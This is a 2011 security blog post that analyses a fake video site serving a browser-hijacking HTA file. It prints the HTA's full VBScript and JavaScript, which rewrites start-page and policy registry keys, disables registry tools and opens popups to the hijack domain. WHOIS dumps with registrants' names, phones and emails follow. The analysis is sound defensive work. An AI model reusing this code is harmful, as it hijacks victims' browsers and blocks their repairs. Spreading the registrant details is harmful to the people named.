Blog for hpHosts, and whatever else I feel like writing about ....

Saturday 8 January 2011

RapidSwitch, fake movies and a browser hijack

Whilst investigating a site earlier, I stumbled upon a site claiming to be a vanilla porn site. Not surprisingly, it turned out to be slightly more than that.

This site offers its victims the usual player you're used to seeing on the likes of YouTube - with a major difference. Instead of the fake codec, or actual video, an HTA is downloaded and executed, that contains;

<html><head>
<hta:application id=hta_note_id
applicationName=hta_note_name
showInTaskBar=no
caption=no
innerBorder=no
selection=no
scroll=no
contextmenu=no />
<script language=javascript>
window.resizeTo(0, 0);
window.moveTo(0, 0);
</script>
<SCRIPT language=vbs>
self.MoveTo 0, 0
Set shell = CreateObject("WScript.Shell")
shell.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\Prefixes\\mirc","http://search.asgunyapi.com","REG_SZ"
shell.regwrite "HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
shell.regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
shell.regwrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://search.asgunyapi.com","REG_SZ"
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://search.asgunyapi.com","REG_SZ"
shell.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\\DisableRegistryTools","00000001","REG_DWORD"
self.Close
</SCRIPT>

<script language="JavaScript">
<!--
function FP_openNewWindow(w,h,nav,loc,sts,menu,scroll,resize,name,url) {//v1.0
var windowProperties=''; if(nav==false) windowProperties+='toolbar=no,'; else
windowProperties+='toolbar=yes,'; if(loc==false) windowProperties+='location=no,';
else windowProperties+='location=yes,'; if(sts==false) windowProperties+='status=no,';
else windowProperties+='status=yes,'; if(menu==false) windowProperties+='menubar=no,';
else windowProperties+='menubar=yes,'; if(scroll==false) windowProperties+='scrollbars=no,';
else windowProperties+='scrollbars=yes,'; if(resize==false) windowProperties+='resizable=no,';
else windowProperties+='resizable=yes,'; if(w!="") windowProperties+='width='+w+',';
if(h!="") windowProperties+='height='+h; if(windowProperties!="") {
if( windowProperties.charAt(windowProperties.length-1)==',')
windowProperties=windowProperties.substring(0,windowProperties.length-1); }
window.open(url,name,windowProperties);
}
// -->
</script>
</head>
<body onbeforeunload="FP_openNewWindow('1024', '768', false, false, false, false, true, false, 'Duyuru', /*href*/'http://search.asgunyapi.com')">
</body>


You'll have noticed the hijacks to search.asgunyapi.com. This chap is hosted by HostGator (already fired off an abuse report), and should hopefully be down soon;

Host: search.asgunyapi.com
Current IP: 74.54.218.98
IP PTR: gator441.hostgator.com
ASN: 21844 74.52.0.0/14 THEPLANET-AS - ThePlanet.com Internet Services, Inc.

Registration Service Provided By: REG2C
Contact: +90.2242248640
Website: http://www.reg2c.com

Domain Name: ASGUNYAPI.COM

Registrant:
lider
halil -(279214) (strom_@msn.com)
istanbul
istanbul
,34100
TR
Tel. +90.05374067878
Fax. +90.02126179416

Creation Date: 22-Mar-2010
Expiration Date: 22-Mar-2011

Domain servers in listed order:
ns882.hostgator.com
ns881.hostgator.com

Administrative Contact:
lider
halil -(279214) (strom_@msn.com)
istanbul
istanbul
,34100
TR
Tel. +90.05374067878
Fax. +90.02126179416

Technical Contact:
lider
halil -(279214) (strom_@msn.com)
istanbul
istanbul
,34100
TR
Tel. +90.05374067878
Fax. +90.02126179416

Billing Contact:
lider
halil -(279214) (strom_@msn.com)
istanbul
istanbul
,34100
TR
Tel. +90.05374067878
Fax. +90.02126179416

Status:LOCKED


The best part however, is the delivery site itself - this little chap is hosted by the infamously crimeware friendly, RapidSwitch. RapidSwitch is an ISP with a history of housing everything from warez to phishing to malware. Incidentally, I recently fired off an abuse report to RapidSwitch, and was rather surprised to find they'd finally gone ahead with their promise of blocking me from e-mailing them (better late than never I suppose, they said they were doing so 2 years ago - but little hint RapidSwitch - it's not the best way of convincing someone to unblacklist you).

Host: kalitepornolar.org
Current IP: 95.154.242.200
IP PTR: Resolution failed
ASN: 29131 95.154.192.0/18 RAPIDSWITCH-AS RapidSwitch

Domain ID:D160877627-LROR
Domain Name:KALITEPORNOLAR.ORG
Created On:09-Dec-2010 08:57:49 UTC
Last Updated On:09-Dec-2010 13:51:59 UTC
Expiration Date:09-Dec-2011 08:57:49 UTC
Sponsoring Registrar:GoDaddy.com, Inc. (R91-LROR)
Status:CLIENT DELETE PROHIBITED
Status:CLIENT RENEW PROHIBITED
Status:CLIENT TRANSFER PROHIBITED
Status:CLIENT UPDATE PROHIBITED
Status:TRANSFER PROHIBITED
Registrant ID:CR69417596
Registrant Name:okan delikaya
Registrant Street1:arn. merk mah eyupsultan cad
Registrant Street2:arnavutkoy
Registrant Street3:
Registrant City:istanbul
Registrant State/Province:arnavutkoy
Registrant Postal Code:34275
Registrant Country:TR
Registrant Phone:+90.05302731122
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email: okan@kriptex.com
Admin ID:CR69417598
Admin Name:okan delikaya
Admin Street1:arn. merk mah eyupsultan cad
Admin Street2:arnavutkoy
Admin Street3:
Admin City:istanbul
Admin State/Province:arnavutkoy
Admin Postal Code:34275
Admin Country:TR
Admin Phone:+90.05302731122
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin Email: okan@kriptex.com
Tech ID:CR69417597
Tech Name:okan delikaya
Tech Street1:arn. merk mah eyupsultan cad
Tech Street2:arnavutkoy
Tech Street3:
Tech City:istanbul
Tech State/Province:arnavutkoy
Tech Postal Code:34275
Tech Country:TR
Tech Phone:+90.05302731122
Tech Phone Ext.:
Tech FAX:
Tech FAX Ext.:
Tech Email: okan@kriptex.com
Name Server:NS2.KALITELIPORNOLAR.ORG
Name Server:NS1.KALITELIPORNOLAR.ORG
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
DNSSEC:Unsigned


One of the many sites leading to these fake movie sites is turkpornoizle.tk, which should be down shortly.

Host: turkpornoizle.tk
Current IP: 212.7.200.223
IP PTR: Resolution failed
ASN: 16265 212.7.192.0/19 LEASEWEB LEASEWEB AS

No comments: